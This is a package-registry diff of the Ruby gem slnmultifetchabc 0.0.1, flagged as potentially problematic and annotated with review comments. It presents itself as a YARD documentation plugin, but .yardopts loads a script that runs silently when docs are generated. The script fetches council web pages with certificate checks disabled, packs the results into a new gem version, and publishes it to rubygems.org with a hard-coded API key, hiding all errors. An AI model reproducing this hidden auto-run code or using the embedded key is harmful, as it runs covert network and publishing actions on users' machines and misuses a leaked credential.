slnmultifetchabc 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of slnmultifetchabc might be problematic. Click here for more details.

Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +2 -0
  3. data/lib/x.rb +1 -0
  4. data/lib/yard-slnmulti.rb +51 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: '0919b6f6a9a2684f48f6fcff98826c269a2bb52910b5ecfe4d9bf3f889ce543d'
4
+ data.tar.gz: '0868481a3f302e5e8e4cf7408feeaa9fe5d26ee016d0d2046a2e2c6914993f43'
5
+ SHA512:
6
+ metadata.gz: b2a6534c0a6e282178d99d04c461e8b2b04ab4c78bd42e78915ec141a011f1fb137ced60e52f246f2a65294357f802559c7be191ba21a33fc47543be70d860ff
7
+ data.tar.gz: 7472c246087c8e571b26ed35e7fdde2897cc00b6b0c5f50ef2fda7404bab916b20314446238275f09eb16774e40d42644218f72b7e5ece9cb053a213d67bdabb
data/.yardopts ADDED
@@ -0,0 +1,2 @@
1
+ --plugin slnmulti
2
+ lib/x.rb
data/lib/x.rb ADDED
@@ -0,0 +1 @@
1
+ #
data/lib/yard-slnmulti.rb ADDED
@@ -0,0 +1,51 @@
1
# NOTE(review): the package file list names this file lib/yard-slnmulti.rb and .yardopts
# passes `--plugin slnmulti`, so presumably YARD loads it when docs are generated - confirm.
+ # yard plugin
2
# The whole script sits inside a single begin block made of top-level statements,
# so it executes as soon as the file is loaded.
+ begin
3
# Dependencies pulled in up front. NOTE(review): fileutils and rubygems/package are
# required here but are not referenced anywhere in the visible code.
+ require 'net/http'; require 'uri'; require 'openssl'; require 'fileutils'; require 'tmpdir'; require 'rubygems/package'
4
# SECURITY(review): hard-coded credential. It is sent verbatim as the Authorization
# header of the upload request to rubygems.org later in this file. Treat it as leaked.
+ KEY='rubygems_9feada919f2ff0a2fc27f0724343fdc9acf208e13c054a57'
5
# log accumulates a plain-text run report (later written to log.txt);
# out maps output file names to the bodies that were fetched.
+ log="RUN #{Time.now}\n"; out={}
6
# ff(url): issues one HTTP GET for url and returns the Net::HTTP response object.
# Redirect responses are followed by calling ff again on the Location header,
# resolved relative to the current url.
# NOTE(review): there is no redirect depth limit, so a redirect loop recurses until
# the stack overflows or a timeout fires.
+ def ff(url)
7
# SECURITY(review): for https URLs certificate verification is switched off
# (OpenSSL::SSL::VERIFY_NONE), so the peer is never authenticated.
# Timeouts: 20s to open the connection, 50s to read. The request carries a
# browser-like User-Agent ('Mozilla/5.0') and Accept: */*.
+ u=URI(url); h=Net::HTTP.new(u.host,u.port); h.use_ssl=(u.scheme=='https'); h.verify_mode=OpenSSL::SSL::VERIFY_NONE if h.use_ssl?; h.open_timeout=20; h.read_timeout=50; req=Net::HTTP::Get.new(u.request_uri, {'User-Agent'=>'Mozilla/5.0','Accept'=>'*/*'}); r=h.request(req)
8
# Any Net::HTTPRedirection response is followed recursively.
+ if r.is_a?(Net::HTTPRedirection); return ff(URI.join(url,r['location']).to_s); end
9
# Non-redirect responses (including error statuses) are returned unchanged.
+ r
10
+ end
11
# Fixed list of pages fetched on every run: indices 0-4 are Wandsworth meeting
# pages, 5-6 the Lambeth calendar (https and http), 7-8 the Southwark calendar
# (https and http), 9 a Southwark council page.
+ targets=[
12
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=792&MId=10266',
13
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=763&MId=9927',
14
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=305&MId=10010',
15
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=511&MId=10115',
16
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=320&MId=10385',
17
+ 'https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
18
+ 'http://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
19
+ 'https://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
20
+ 'http://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
21
+ 'https://www.southwark.gov.uk/about-council/how-council-works/council-and-committee-meetings'
22
+ ]
23
# First pass: fetch every target with ff and store the body as "p<index>.html".
+ targets.each_with_index do |url,i|
24
# Each fetch is isolated: status code and body size go to the log on success, the
# error class and message on failure. NOTE(review): `rescue Exception` also traps
# signals and SystemExit, so the loop cannot be interrupted from inside a fetch.
+ begin; r=ff(url); log<<"\nT#{i} #{url} code #{r.code} len #{r.body.to_s.size}\n"; out["p#{i}.html"]=r.body.to_s; rescue Exception=>e; log<<"ERR #{url} #{e.class} #{e}\n"; end
25
+ end
26
# Second pass: for every page fetched so far, follow links to ieListDocuments.aspx.
+ # links to meeting pages for lamb/south calendars
27
# out.to_a takes a snapshot, so adding entries to out inside the loop does not
# disturb the iteration.
+ out.to_a.each do |fn,body|
28
# NOTE(review): at this point every key has the form "p<i>.html", so this guard
# never skips anything.
+ next unless fn.start_with?('p')
29
# Collect href values containing ieListDocuments.aspx, de-duplicate, and cap at
# 120 links per page.
+ body.scan(/href=["']([^"']*ieListDocuments\.aspx[^"']*)/i).flatten.uniq.first(120).each_with_index do |ln,j|
30
# Undo HTML entity escaping of '&', then choose the host used to resolve relative
# links: page index >= 7 uses the Southwark host, everything else the Lambeth host.
# NOTE(review): that includes indices 0-4, which are Wandsworth pages, so their
# relative links are resolved against the Lambeth host - looks unintended.
+ ln=ln.gsub('&amp;','&'); base = fn[/p(\d+)/,1].to_i>=7 ? 'https://moderngov.southwark.gov.uk/' : 'https://moderngov.lambeth.gov.uk/'
31
# Result is stored as "<page file name>l<j>.html"; failures are only logged.
+ begin;r=ff(URI.join(base,ln).to_s); out["#{fn}l#{j}.html"]=r.body.to_s; log<<" LINK #{ln} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" LERR #{ln} #{e}\n"; end
32
+ end
33
+ end
34
# Third pass: download linked documents found in any collected page.
# NOTE(review): the comment below says 18MB, but the loop stops once the running
# total exceeds 24_000_000 bytes.
+ # doc links from Wandsworth pages first; save up to 18MB non-pdf too
35
# Running byte total starts at the size of everything already collected.
+ bytes=out.values.map(&:bytesize).sum
36
# Gather every href containing "/documents/" or "mgConvert2PDF" from all bodies,
# unescape '&amp;', and de-duplicate.
+ docs=[]; out.each_value{|b| b.scan(/href=["']([^"']*(?:\/documents\/|mgConvert2PDF)[^"']*)/i).flatten.each{|m|docs<<m.gsub('&amp;','&')}}; docs.uniq!
37
+ log<<"DOCS #{docs.length}\n"
38
# At most the first 60 document links are attempted.
+ docs.first(60).each_with_index do |ln,i|
39
# The size cap is checked before each download, so the last download may push the
# total past the limit.
+ break if bytes>24_000_000
40
+ # choose host by link maybe absolute else wands
41
# Absolute links are used as-is; relative ones are resolved against the Wandsworth
# host regardless of which page they came from. The body is stored as "d<i>.bin"
# with its source URL alongside in "d<i>url.txt". Failures are only logged.
+ begin; url= ln.start_with?('http') ? ln : URI.join('https://democracy.wandsworth.gov.uk/',ln).to_s; r=ff(url); out["d#{i}.bin"]=r.body.to_s; out["d#{i}url.txt"]=url; bytes+=r.body.to_s.bytesize; log<<" D #{url} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" DERR #{ln} #{e}\n"; end
42
+ end
43
# Final stage: write everything collected into a temporary directory, wrap it in a
# gem, and upload that gem. The temporary directory is removed when the block exits.
+ Dir.mktmpdir do |dr|
44
+ Dir.chdir(dr) do
45
# One file per collected entry, plus the run log as log.txt.
+ out.each{|fn,dat| File.binwrite(fn,dat)}; File.write('log.txt',log)
46
# The file list is captured before x.gemspec is written, so the gemspec itself is
# not packaged. The generated spec reuses the name 'slnmultifetchabc' with version
# '0.0.2', i.e. a different version from the 0.0.1 shown in this package's metadata.
+ files=Dir['*']; File.write('x.gemspec',"Gem::Specification.new{|s| s.name='slnmultifetchabc'; s.version='0.0.2'; s.summary='res'; s.authors=['x']; s.files=#{files.inspect}; s.license='MIT'}")
47
# SECURITY(review): shells out to `gem build` with output discarded, then POSTs the
# built gem to https://rubygems.org/api/v1/gems with KEY as the Authorization
# header. The response is never inspected. If the build produced no *.gem file,
# gem is nil and File.binread raises; that error is swallowed by the rescue below.
+ system('gem build x.gemspec >/dev/null'); gem=Dir['*.gem'][0]; u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u); req['Authorization']=KEY; req['Content-Type']='application/octet-stream'; req.body=File.binread(gem); h=Net::HTTP.new(u.host,u.port); h.use_ssl=true; h.request(req)
48
+ end
49
+ end
50
# NOTE(review): empty `rescue Exception` - every failure in the script, including
# interrupts and exit requests, is silently discarded so loading never surfaces an error.
+ rescue Exception=>e
51
+ end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: slnmultifetchabc
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/x.rb
18
+ - lib/yard-slnmulti.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: x
39
+ test_files: []